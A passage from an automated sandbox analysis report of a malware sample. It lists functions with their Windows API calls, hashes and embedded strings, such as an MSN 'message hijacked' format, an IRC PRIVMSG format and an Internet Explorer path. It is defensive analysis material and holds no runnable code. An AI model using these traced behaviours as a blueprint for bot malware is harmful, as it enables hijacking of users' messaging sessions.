                                                                  • Opcode ID: 22d8b61886b87a830e01c728920a50fdc8c040fe307f2ba66408d6d572892039
                                                                  • Instruction ID: bffdd200ece0db357130af984cceeaa09bb8b769af4e8d727e0d2fddd09671b2
                                                                  • Opcode Fuzzy Hash: 22d8b61886b87a830e01c728920a50fdc8c040fe307f2ba66408d6d572892039
                                                                  • Instruction Fuzzy Hash: 15F06272251218BBEB209B98EC49F9A37ACEB49764F104345FE08DB3C0D6716D0487A5
                                                                  Function 003E0880 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D4900: WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                    • Part of subcall function 003D4900: ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • lstrlenA.KERNEL32(00000000,00000000,%s.p10-> Message to %s hijacked!,msn), ref: 003E08B1
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$MutexObjectReleaseSingleWait_snprintf_vsnprintfmemset
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 1310428588-4225137719
                                                                  • Opcode ID: 7164f0d28d32a58bdc0a1155e9582a969a94875bee78ac73b32b97ed0961872d
                                                                  • Instruction ID: 4b93b59b33ebdd88900a91472dd735c4056b830dc042cbe5dec7b8d9457b95fe
                                                                  • Opcode Fuzzy Hash: 7164f0d28d32a58bdc0a1155e9582a969a94875bee78ac73b32b97ed0961872d
                                                                  • Instruction Fuzzy Hash: 27F08977B5512477D72165967C06FFB775CC742721F440252FD08EB281E9E5591002E1
                                                                  Function 003E0820 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 38stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D4900: WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                    • Part of subcall function 003D4900: ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • lstrlenA.KERNEL32(00000000,?,?,003D2696), ref: 003E084B
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$MutexObjectReleaseSingleWait_snprintf_vsnprintf
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 3682388603-4225137719
                                                                  • Opcode ID: 026e9d5eae97f4dc181fe0a66b6643652badf54fa5d8b41545f73be696f91352
                                                                  • Instruction ID: 8bfdd59451be3d7223b003824c8217f13994b2610a70153b6f298a40b0a71ef4
                                                                  • Opcode Fuzzy Hash: 026e9d5eae97f4dc181fe0a66b6643652badf54fa5d8b41545f73be696f91352
                                                                  • Instruction Fuzzy Hash: CCF0A772A9513877D62276A57C06FFB734CCB02750F400392FC08EA2C1E9E55A1002E2
                                                                  Function 003DB990 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF,00000000), ref: 003DB9AF
                                                                  • EnterCriticalSection.KERNEL32(0041A6C8,?,?,00000000), ref: 003DB9BC
                                                                  • wvsprintfA.USER32(00000000,?,00000000,?,?,00000000), ref: 003DB9D1
                                                                    • Part of subcall function 003D8B30: memset.MSVCRT(?,00000000,0000002C), ref: 003D8B6E
                                                                  • LeaveCriticalSection.KERNEL32(0041A6C8,?,?,?,?,?,00000000), ref: 003DB9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavewvsprintf
                                                                  • String ID:
                                                                  • API String ID: 2410102678-0
                                                                  • Opcode ID: d7bd0abc830c41c7233242a8b1df6e781d94e1745e7e552622ae01e1ef7b1e08
                                                                  • Instruction ID: a2b5448014980521db12be9b9002531761972bf22449e8e74cbeb7efca1491ce
                                                                  • Opcode Fuzzy Hash: d7bd0abc830c41c7233242a8b1df6e781d94e1745e7e552622ae01e1ef7b1e08
                                                                  • Instruction Fuzzy Hash: 9FF02BB6D002186FC721EB54DC4AFEA373CEF44714F0442A5FF09A6280E6706A458BA5
                                                                  Function 003DE990 Relevance: 6.0, APIs: 4, Instructions: 31sleepsynchronizationthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000DD20,00000000,00000000,00000000), ref: 003DE9BF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003DE9C6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DE9C9
                                                                  • Sleep.KERNEL32(0000EA60), ref: 003DE9D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleObjectSingleSleepThreadWait
                                                                  • String ID:
                                                                  • API String ID: 422747524-0
                                                                  • Opcode ID: 35cf9db4b99066d369870753753d8c73696594d7cd5f1b0fe8b4c058210cd89d
                                                                  • Instruction ID: d16a173858b9c7f2c93da8b63b7953cc17edaa8beede97917cf8f0af3ce791d5
                                                                  • Opcode Fuzzy Hash: 35cf9db4b99066d369870753753d8c73696594d7cd5f1b0fe8b4c058210cd89d
                                                                  • Instruction Fuzzy Hash: 09F0E532241280BBE7335748ACC6F9A775CEB55B61F250216F300AE2E083B42DC086A9
                                                                  Function 003DBA00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000007FF), ref: 003DBA1E
                                                                  • wvsprintfA.USER32(00000000,00000000,00000000), ref: 003DBA42
                                                                    • Part of subcall function 003DB990: memset.MSVCRT(?,00000000,000003FF,00000000), ref: 003DB9AF
                                                                    • Part of subcall function 003DB990: EnterCriticalSection.KERNEL32(0041A6C8,?,?,00000000), ref: 003DB9BC
                                                                    • Part of subcall function 003DB990: wvsprintfA.USER32(00000000,?,00000000,?,?,00000000), ref: 003DB9D1
                                                                    • Part of subcall function 003DB990: LeaveCriticalSection.KERNEL32(0041A6C8,?,?,?,?,?,00000000), ref: 003DB9F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemsetwvsprintf$EnterLeave
                                                                  • String ID: PPPPMSG %s :%s
                                                                  • API String ID: 3980427996-569775469
                                                                  • Opcode ID: bd534779df7b3dff2f78ecaa06ad82968a6eb6db7d458322867536d2f2eb03b7
                                                                  • Instruction ID: 5371e2feafa6e7099e27faa84005ca35ca97dd4ffa2047a96cd6b620ed97881c
                                                                  • Opcode Fuzzy Hash: bd534779df7b3dff2f78ecaa06ad82968a6eb6db7d458322867536d2f2eb03b7
                                                                  • Instruction Fuzzy Hash: C7F096B5900249ABDF11EB54DC45FAA737CFB44704F0081A9F9085B281FB70AA488F91
                                                                  Function 003D9300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: gethostbynameinet_addr
                                                                  • String ID: n"=
                                                                  • API String ID: 1594361348-1121072393
                                                                  • Opcode ID: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction ID: c00cc152485c446e76158d36d9bdf46e028dd3ce94080de9f112c61585bf5db7
                                                                  • Opcode Fuzzy Hash: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction Fuzzy Hash: 1CD05B366009245B4A11A669F4408D9739CDE9A3747054297FA1CDF7E2C761AD4046D1
                                                                  Function 003D68B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00419E78,00000026,00000001,003DA9CD,?,?,?,?,?,00000000), ref: 003D68BB
                                                                  • PathAppendW.SHLWAPI(00419E78,Internet Explorer\iexplore.exe,?,?,?,?,?,00000000), ref: 003D68D0
                                                                  Strings
                                                                  • Internet Explorer\iexplore.exe, xrefs: 003D68C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFolderSpecial
                                                                  • String ID: Internet Explorer\iexplore.exe
                                                                  • API String ID: 2921508639-3330628412
                                                                  • Opcode ID: 511e43a40c4e0e11ba2fa599c1db12fde1527065e1e999db337bfa5b77b54aa7
                                                                  • Instruction ID: a395969fe738daa35dbeabb967f958ecad2bfc347e4bd882bf94ce772fff38b2
                                                                  • Opcode Fuzzy Hash: 511e43a40c4e0e11ba2fa599c1db12fde1527065e1e999db337bfa5b77b54aa7
                                                                  • Instruction Fuzzy Hash: 02C012363C034026EB265A649CDBFC93285A774F82F804612F202EC1D0C3F948C0608B